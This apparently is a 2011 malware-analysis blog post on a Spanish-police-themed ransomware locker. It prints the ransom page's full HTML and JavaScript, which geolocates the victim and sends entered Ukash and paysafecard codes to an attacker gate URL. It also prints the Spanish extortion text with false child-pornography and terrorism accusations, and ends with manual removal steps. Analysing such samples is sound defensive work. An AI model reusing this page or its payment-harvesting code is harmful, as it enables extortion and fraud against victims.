Sunday, 4 September 2011

Trojan.Ransom: La policía ESPAÑOLA

 A variant of the Fake Federal German Police (BKA) notice, as usual no possibility to unlock the computer with a serial, manual remove is the only available option.


html rip:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
    font-size: 16px;
    font-weight: bold;
    font-family: Arial, Helvetica, sans-serif;
}
.style4 {font-size: 12px}
body {
    background-color: #FDFDFF;
}
.style5 {
    font-size: 24px;
    font-weight: bold;
}
.style6 {color: #FFFFFF}
.style7 {font-size: 18px}
html, body {height: 100%;overflow-x: hidden;overflow-y: hidden; cursor:default; }
-->
</style>
<script type="text/javascript">
var oXmlHttp;
var bGood;
var ip;
var isp;
var country;
var city;
var speed;
var userid="912ec803b2ce49e4a541068d495ab570";

function createXMLHttp()
{
    if(typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    else if(window.ActiveXObject)
    {
        var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
        for (var i = 0; i < aVersions.length; i++)
       {
           try
           {
               var oXmlHttp = new ActiveXObject(aVersions[i]);
               return oXmlHttp;
           }
           catch (oError)
           {
           }
       }
       throw new Error("");
   }
}

function getFrom_ip2l()
{
   var response="";
   oXmlHttp.open("GET","http://tools.ip2location.com/ib2/",true);
   oXmlHttp.onreadystatechange = function()
   {
       if(oXmlHttp.readyState == 4)
       {
           if(oXmlHttp.status == 200)
           {
               try
               {
                   var ip2l = oXmlHttp.responseText;
                   re = /Your IP Address is <b>(.*)<\/b> ISP:/i;
                    ip = ip2l.match(re);
                    re = /ISP: <b>(.*)<\/b> Country:/i;
                    isp = ip2l.match(re);
                    re = /Country: <b>(.*)<\/b> Region:/i;
                    country = ip2l.match(re);
                    re = /City: <b>(.*)<\/b> Time Zone:/i;
                    city = ip2l.match(re);
                    s_ip = ip[1];
                    if (s_ip == "")
                    {
                        s_ip = "78.121.39.75";
                    }
                    document.getElementById("ip_text").innerHTML = s_ip;
                    document.getElementById("v_ip").innerHTML = "IP: "+s_ip;
                    document.getElementById("v_country").innerHTML = "Country: "+country[1];
                    document.getElementById("v_cyti").innerHTML = "City: "+city[1];
                    document.getElementById("v_prov").innerHTML = "ISP: "+isp[1];
                }
                catch(e){}
            }
        }
    };
    oXmlHttp.send(null);
}

function sendukash()
{
    try
    {
        var response="";
        var d = document.getElementById("code1").value;
        document.getElementById("code1").value = "";
        if(d.length < 1)
       {
           return 0;
       }
       oXmlHttp.open("GET","http://bundespol.net/es/1/gate.php?cmd=data&card=ukash&id="+userid+"&code="+d,true);
       oXmlHttp.send(null);
   }
   catch(e){}
}

function sendps()
{
   try
   {
       var response="";
       var d = document.getElementById("code2").value;
       document.getElementById("code2").value = "";
       if(d.length < 1)
       {
           return 0;
       }
       oXmlHttp.open("GET","http://bundespol.net/es/1/gate.php?cmd=data&card=psc&id="+userid+"&code="+d,true);
       oXmlHttp.send(null);
   }
   catch(e){}
}

window.onload = function ()
{
   var regexp = /(msie) ([0-9]{1,2}.[0-9]{1,3})/gi;
   var matches = navigator.userAgent.match(regexp);
   var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
   var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
   var os = "";
   for (var i=0;i<iOS.length;i++)
   {
       if (navigator.userAgent.indexOf(iOS[i])>-1)
        {
            os = oOS[i];
            break;
        }
    }
    oXmlHttp = createXMLHttp();
    getFrom_ip2l();
    document.getElementById("v_browser").innerHTML = "Browser: "+matches[0].replace("MSIE","Internet Explorer");
    document.getElementById("v_os").innerHTML = "OS: "+os;
}
</script>
</head>

<body style="overflow-x:hidden; overflow-y:hidden;" onselectstart="return false;" oncontextmenu="return false;">
<table width="1115" border="0" align="center" bordercolor="#F2F2F2">
  <tr>
    <td width="998" background="/PIC/1"><div align="left"><img src="/PIC/2" width="518" height="129"></div></td>
  </tr>
  <tr>
    <td bgcolor="#F2F2F2"><table width="100%" border="0">
      <tr>
        <td><table width="100%"  border="0" align="center" cellpadding="7" cellspacing="7">
          <tr>
            <td width="950" bgcolor="#FFFFFF"><div align="center" class="style1">
              <div align="center">Atenci&oacute;n!!! Ha sido detectada actividad ilegal! Su sistema operativo ha sido bloqueado debido a una infracci&oacute;n de la legislaci&oacute;n alemana! </div>
            </div>
              <div align="center"><span class="style4">Han sido detectadas las siguientes infracciones: Su direcci&oacute;n IP&nbsp; <span id="ip_text"></span>&nbsp;ha sido registrada en las webs ilegales con contenido pornogr&aacute;fico orientadas a la difusi&oacute;n de la pornograf&iacute;a infantil, zoofilia e im&aacute;genes de violencia contra menores! En su ordenador han sido detectados los archivos de v&iacute;deo de contenido pornogr&aacute;fico con elementos de violencia y pornograf&iacute;a infantil! Adem&aacute;s, desde su ordenador se realiza un env&iacute;o ilegal (SPAM) de orientaci&oacute;n pro terrorista. El presente bloqueo ha sido realizado para prevenir la posibilidad de difusi&oacute;n de dichos materiales desde su ordenador en Interne</span>t.<br>
                    <strong>Sus datos <span id="v_ip">IP: </span>&nbsp;<span id="v_browser">Browser: </span>&nbsp;          <span id="v_os">OS: </span> &nbsp;<span id="v_country">Country: </span>&nbsp;<span id="v_cyti">City: </span>&nbsp;  <span id="v_prov">ISP: </span></strong><br>
                    <span class="style4">Para desbloquear su ordenador, usted ha de pagar una multa de 100 euros! La multa ha de ser pagada antes de 24 horas desde el momento del bloqueo de su ordenador! En el caso de impago, todos los datos de su ordenador ser&aacute;n eliminados!<br>
                    Usted tiene dos formas de pagar la multa:<br>
                    1) Usted puede adquirir un cup&oacute;n Ukash por el importe de 100 euros. El n&uacute;mero de ese cup&oacute;n Ukash, usted ha de introducir en el campo del pago y apretar el bot&oacute;n &ldquo;OK&rdquo;. Si el sistema no confirma el pago realizado con &eacute;xito, usted ha de enviar el n&uacute;mero de su voucher por e-mail.<br>
                    2) Usted puede pagar la multa mediante paysafecard. Usted ha de pagar paysafecard por el importe de 100 euros. Usted ha de introducir el c&oacute;digo PIN del cheque en el campo del pago y apretar el bot&oacute;n &ldquo;OK&rdquo;. Si el sistema no confirma el pago realizado con &eacute;xito, usted ha de enviar el c&oacute;digo PIN por e-mail.<br>
                Env&iacute;e los datos por e-mail: <b>info.lapoliciaespanola@yahoo.com</b></span></div></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><table width="100%"  border="0" align="center" cellpadding="7" cellspacing="7">
          <tr>
            <td width="535" bgcolor="#FFFFFF"><table width="100%"  border="0" align="right">
              <tr>
                <td bgcolor="#CCCCCC"><div align="center" class="style5">Donde conseguir Ukash</div></td>
              </tr>
              <tr>
                <td bgcolor="#FFFFFF"><div align="center">
                  <hr>
                  <img src="/PIC/caixagaliciasmall" width="100" height="21"><span class="style6">///</span><span class="style6">///</span><img src="/PIC/canalrecargas_small" width="100" height="17"><span class="style6">///</span><span class="style6">///</span> <img src="/PIC/correos_small" width="90" height="28"><span class="style6">///</span><span class="style6">///</span><img src="/PIC/logo-cajamar" width="100" height="32"></div></td>
              </tr>
              <tr>
                <td><div align="center"><img src="/PIC/payzonesmalltrans" width="41" height="47"><span class="style6">///</span><span class="style6">///</span><img src="/PIC/telecor_small" width="90" height="34"><span class="style6">///</span><span class="style6">///</span><span class="style6">///</span><img src="/PIC/telefonica_small" width="100" height="32"><span class="style6">///</span><span class="style6">///</span><img src="/PIC/munditab" width="116" height="17">
                  <hr>
                </div></td>
              </tr>
              <tr>
                <td><table width="100%"  border="0">
                  <tr>
                    <td width="43%"><img src="/PIC/ucash" width="229" height="70"></td>
                    <td width="57%"><table width="100%"  border="0">
                      <tr>
                        <td><input name="textfield" type="text" class="style7" id="code1"></td>
                        <td>                          <input type="submit" value="Ok" style="width:80px;height:27px" onclick="sendukash();"></td>
                      </tr>
                    </table></td>
                  </tr>
                </table></td>
              </tr>
            </table></td>
            <td width="519" bgcolor="#FFFFFF"><div align="center" class="style1">
              <table width="100%"  border="0">
                <tr>
                  <td><div align="center"><img src="/PIC/paysafe" width="342" height="105"></div></td>
                </tr>
                <tr>
                  <td><table width="63%"  border="0" align="center">
                    <tr>
                      <td width="42%"><input name="textfield2" type="text" class="style7" id="code2"></td>
                      <td width="58%">
                        <input type="submit" value="Ok" style="width:80px;height:27px" onclick="sendps();"></td>
                    </tr>
                  </table></td>
                </tr>
              </table>
              </div>                </td>
          </tr>
        </table></td>
      </tr>
    </table></td>
  </tr>
</table>

</body>
</html>

CAIXAGALICIASMALL


CANALRECARGAS_SMALL

CORREOS_SMALL

LOGO-CAJAMAR

MUNDITAB

 PAYSAFE

 PAYZONESMALLTRANS

TELECOR_SMALL

TELEFONICA_SMALL

UCASH

1





2


3


Magic loop anti taskmgr.exe and explorer.exe

Manual remove:
1) Restart your pc
2) Before the Windows XP splash screen, press the F8 key to enter the Windows Advanced Options Menu and choose: Safe Mode With Command Prompt
3) Type 'regedit' in the console and go here:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
4) Find the key 'Shell' and replace the value by 'Explorer.exe'
5) Reboot your pc.

No comments:

Post a comment